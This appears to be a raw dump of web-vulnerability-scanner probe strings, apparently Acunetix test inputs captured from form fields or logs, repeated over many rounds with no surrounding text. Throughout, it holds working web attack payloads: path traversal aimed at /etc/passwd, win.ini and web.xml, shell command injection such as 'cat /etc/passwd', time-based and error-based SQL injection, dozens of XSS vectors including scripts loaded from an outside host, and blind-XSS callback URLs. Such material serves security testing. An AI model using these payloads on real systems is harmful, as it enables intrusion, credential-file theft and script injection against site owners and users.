..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

${100039+100380}

1

`cat /etc/passwd`

1

1

1<body onload=prompt(940903)>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1

1&n965249=v973521

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986330)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

)

1

'|'ld

1

1

1

1<img src=xyz OnErRor=prompt(969053)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

"|"ld

1<img/src=">" onerror=alert(902147)>

1

hrRFIjaH'

^(#$!@#$)(()))******

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

1<ScRiPt%20>prompt(956263)</sCripT>

'

1

aKZzno3U')

1

1

/etc/passwd

1

1&lt

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

EP4D0Cin'))

'

1

1

\xf6<img acu onmouseover=prompt(922984) //\xf6>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

-1

1

1

"

1<input autofocus onfocus=prompt(966028)>

1

http://hiteqR8bWn99a.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1)

||cat /etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

&dir

[url=http://www.acunetix.com]website security[/url]

comments

1

http://www.acunetix.tst

'"

'&dir&'

MIRdQRYn'

comments

1'"()&%<ScRiPt >prompt(946541)</ScRiPt>

1_V1Elo <ScRiPt >prompt(950364)</ScRiPt>

1

<!--

1

1

"&dir&"

TBeBkuVd')

comments/.

1

'"()&%<ScRiPt >prompt(998151)</ScRiPt>

1

file:///etc/passwd

1

1

1

P7NOCTWL'))

1

|dir

1_947547

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

1

1

acu9563\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9563

../../../../../../../../../../windows/win.ini

1

acux4791\xc0\xbez1\xc0\xbcz2a\x90bcxuca4791

1

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(983108)</ScRiPt>

1

1

1<script>prompt(988338)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(933515)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959033></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(902207)</ScRiPt>

1

................windowswin.ini

1

1<video><source onerror="javascript:prompt(939106)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907224)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

response.write(9092975*9339051)

1

1<div style=width:expression(prompt(973926))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9092975*9339051)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

"+response.write(9092975*9339051)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937564)>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957441)>

1

WEB-INF/web.xml

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1<img src=xyz OnErRor=prompt(919988)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

WEB-INF\web.xml

1

`cat /etc/passwd`

-1

1<img/src=">" onerror=alert(981526)>

${100072+100455}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1)

|cat /etc/passwd#

1<ScRiPt%20>prompt(931035)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n945067=v923285

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

-1))

)

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

\xf6<img acu onmouseover=prompt(906858) //\xf6>

VmGKOyVG'

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1<input autofocus onfocus=prompt(902694)>

SGOW6PFx')

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

testasp.vulnweb.com

1

<a href='http://www.acunetix.com'>website security</a>

'

'

wBqfAFdA'))

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

[url=http://www.acunetix.com]website security[/url]

1

1

1

"

1

1

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1_uGrCr <ScRiPt >prompt(900221)</ScRiPt>

-1)

http://hitlZgMGiNhbB.bxss.me/

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

1

comments

1

1

vvAijoRJ'

1

http://www.acunetix.tst

comments

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

1

LjKuDDiF')

1

comments/.

"&dir&"

1

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(937829)</ScRiPt>

<!--

SgTqBu7G'))

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

'"()&%<ScRiPt >prompt(951534)</ScRiPt>

1

1

1

1

'|dir

1_947311

1

WEB-INF/web.xml

1

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu1392\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1392

1

../../../../../../../../../../boot.ini

1

acux4166\xc0\xbez1\xc0\xbcz2a\x90bcxuca4166

1

1<ScRiPt >prompt(902929)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(932062)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(916649)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969634></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(949671)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(987824)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(975779)"></g></svg>

1

response.write(9412389*9209370)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(953433))>

1

'+response.write(9412389*9209370)+'

1

1

1

1<iframe src='data:text/html

1

"+response.write(9412389*9209370)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<body onload=prompt(961647)>

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948994)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(939186)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<img/src=">" onerror=alert(983434)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1<ScRiPt%20>prompt(914870)</sCripT>

1

1

${100001+100177}

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

|cat /etc/passwd#

1&n966779=v906007

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(977975) //\xf6>

)

1<input autofocus onfocus=prompt(934577)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

ae9qAOTM'

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

'"()

<a href='http://www.acunetix.com'>website security</a>

b9Zo47DH')

/etc/passwd

1

1

testasp.vulnweb.com

"|"ld

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

C9VHfjGI'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

'

1_ebhQf <ScRiPt >prompt(950609)</ScRiPt>

-1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

-1)

1

1

'

http://hitLTv1R1BrvF.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

sNgDsUo8'

1

1

comments

1

1

||cat /etc/passwd

1

http://www.acunetix.tst

SPh2vrjF')

file:///etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(938775)</ScRiPt>

comments

&dir

1Szeo0Qz'))

/\../\../\../\../\../\../\../etc/passwd

comments/.

'"()&%<ScRiPt >prompt(995641)</ScRiPt>

<!--

1

1

WEB-INF/web.xml

1

1

1

1_956153

'&dir&'

1

WEB-INF\web.xml

1

1

1

1

"&dir&"

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

'|dir

1

acu6775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6775

1

acux4314\xc0\xbez1\xc0\xbcz2a\x90bcxuca4314

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"|dir

1<ScRiPt >prompt(987838)</ScRiPt>

1

1

1

1<script>prompt(935639)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(911147)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952489></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(936810)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(991759)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918279)"></g></svg>

1

1

1

1<div style=width:expression(prompt(945433))>

response.write(9430886*9414626)

1

1

1<iframe src='data:text/html

'+response.write(9430886*9414626)+'

1

&cat /etc/passwd&

1

"+response.write(9430886*9414626)+"

1<body onload=prompt(944098)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

'&cat /etc/passwd&'

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918697)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<img src=xyz OnErRor=prompt(959371)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

1

1<img/src=">" onerror=alert(970801)>

${99859+99506}

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1&n920342=v908276

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1<ScRiPt%20>prompt(961315)</sCripT>

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

)

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

\xf6<img acu onmouseover=prompt(925927) //\xf6>

!(()&&!|*|*|

'|'ld

1

SSqPg1x6'

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'"()

'

1

1<input autofocus onfocus=prompt(916675)>

^(#$!@#$)(()))******

1

"|"ld

1

yp1BwnsE')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

KNHJHhGS'))

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

1

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_itXo8 <ScRiPt >prompt(916572)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit7aHXrLAuVG.bxss.me/

-1))

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit7aHXrLAuVG.bxss.me/

-1))

o9PYKT6B'

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit7aHXrLAuVG.bxss.me/

qwLymdUM'

1

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

1

8yC6x7RU')

W32TzrM6')

1

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

1

ziriOh8g'))

1

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

1

zj2ARuAi'))

8glgyHaY'))

1

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1'"

&dir

1

1

1

comments

http://www.acunetix.tst

1

http://hit7aHXrLAuVG.bxss.me/

-1))

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1'"

&dir

1

1

1

comments

http://www.acunetix.tst

1

'"

file:///etc/passwd

'&dir&'

1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(107),CHAR(119),CHAR(115),CHAR(73),CHAR(76),CHAR(98),CHAR(65)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

comments

1

<!--

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(923018)</ScRiPt>

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(107),CHAR(119),CHAR(115),CHAR(73),CHAR(76),CHAR(98),CHAR(65)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

comments/.

1

1

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(85)+CHAR(107)+CHAR(119)+CHAR(115)+CHAR(73)+CHAR(76)+CHAR(98)+CHAR(65)) FROM syscolumns)

|dir

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(967359)</ScRiPt>

1

1

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(85)+CHAR(107)+CHAR(119)+CHAR(115)+CHAR(73)+CHAR(76)+CHAR(98)+CHAR(65))

WEB-INF\web.xml

1

1_977019

'|dir

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(57),CHAR(83),CHAR(69),CHAR(65),CHAR(99),CHAR(121),CHAR(84),CHAR(67)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

"|dir

1

../../../../../../../../../../windows/win.ini

1

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(57),CHAR(83),CHAR(69),CHAR(65),CHAR(99),CHAR(121),CHAR(84),CHAR(67)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

1

acu7359\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7359

1

1

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(57)+CHAR(83)+CHAR(69)+CHAR(65)+CHAR(99)+CHAR(121)+CHAR(84)+CHAR(67)) FROM syscolumns)+'

1

../../../../../../../../../../boot.ini

1

1

acux3147\xc0\xbez1\xc0\xbcz2a\x90bcxuca3147

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(57)+CHAR(83)+CHAR(69)+CHAR(65)+CHAR(99)+CHAR(121)+CHAR(84)+CHAR(67))+'

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(954155)</ScRiPt>

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(122),CHAR(66),CHAR(68),CHAR(83),CHAR(70),CHAR(115),CHAR(107),CHAR(52)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(916033)</script>

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(122),CHAR(66),CHAR(68),CHAR(83),CHAR(70),CHAR(115),CHAR(107),CHAR(52)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

................windowswin.ini

1

1

1<ScRiPt >prompt(930685)</ScRiPt>

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(122)+CHAR(66)+CHAR(68)+CHAR(83)+CHAR(70)+CHAR(115)+CHAR(107)+CHAR(52)) FROM syscolumns)+"

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(122)+CHAR(66)+CHAR(68)+CHAR(83)+CHAR(70)+CHAR(115)+CHAR(107)+CHAR(52))+"

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984064></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(902033)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(926470)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(909200)"></g></svg>

1

1<div style=width:expression(prompt(960273))>

1

1<iframe src='data:text/html

1

response.write(9144045*9526053)

WEB-INF/web.xml

1

1

1<body onload=prompt(989765)>

1

'+response.write(9144045*9526053)+'

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915278)>

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9144045*9526053)+"

../../../../../../../../../../etc/passwd

1

1<img src=xyz OnErRor=prompt(909878)>

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img/src=">" onerror=alert(935538)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

"&cat /etc/passwd&"

1<ScRiPt%20>prompt(920574)</sCripT>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

${100180+99141}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

-1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1&n948629=v944330

1

1

-1)

`cat /etc/passwd`

\xf6<img acu onmouseover=prompt(954570) //\xf6>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

1

1

-1))

|cat /etc/passwd#

1<input autofocus onfocus=prompt(927269)>

testasp.vulnweb.com

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

KAu7K0FW'

'

'"()

1

'|'ld

1

^(#$!@#$)(()))******

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

kdnEiOlP')

1

"

1

"|"ld

1

1

taQzl9Jp'))

1_ICjvQ <ScRiPt >prompt(977793)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

1

1

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

http://hit2qYtB9Es8V.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1

-1))

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

||cat /etc/passwd

1

g1E8sZZy'

comments

1

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(929625)</ScRiPt>

'"

&dir

file:///etc/passwd

QG5rLmWx')

comments/.

1

'"()&%<ScRiPt >prompt(918896)</ScRiPt>

1

<!--

uOh68jvO'))

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1_928740

1

1

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

1

1

|dir

1

1

1

WEB-INF\web.xml

1

acu9824\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9824

'|dir

1

../../../../../../../../../../windows/win.ini

1

acux7550\xc0\xbez1\xc0\xbcz2a\x90bcxuca7550

"|dir

1

1<ScRiPt >prompt(939700)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(973483)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(914821)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952708></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(903438)</ScRiPt>

1

1

................windowswin.ini

1

1<video><source onerror="javascript:prompt(925494)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(941844)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(904702))>

1

1

response.write(9280695*9033637)

1

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9280695*9033637)+'

1

1

1

1<body onload=prompt(942097)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9280695*9033637)+"

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994491)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(929590)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

